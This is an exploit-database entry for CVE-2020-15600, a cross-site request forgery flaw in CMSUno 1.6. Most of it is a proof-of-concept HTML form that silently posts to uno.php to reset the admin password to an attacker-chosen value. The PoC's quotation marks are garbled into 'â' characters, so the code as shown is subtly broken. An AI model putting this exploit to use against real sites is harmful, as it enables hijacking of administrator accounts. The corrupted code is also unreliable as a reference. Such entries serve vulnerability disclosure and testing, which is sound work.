## https://sploitus.com/exploit?id=1337DAY-ID-34698
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600
An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
PoC :
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=âhttp://127.0.0.1/cmsuno-master/uno.phpâmethod=âPOSTâ>
<input type=âhiddenâ name=âuserâ value=âadminâ/>
<input type=âhiddenâ name=âpassâ value=âyourpasswordâ/>
<input type=âsubmitâ name=âuserâ value=âSubmit requestâ/>
</form>
</body>
</html>
# 0day.today [2020-07-19] #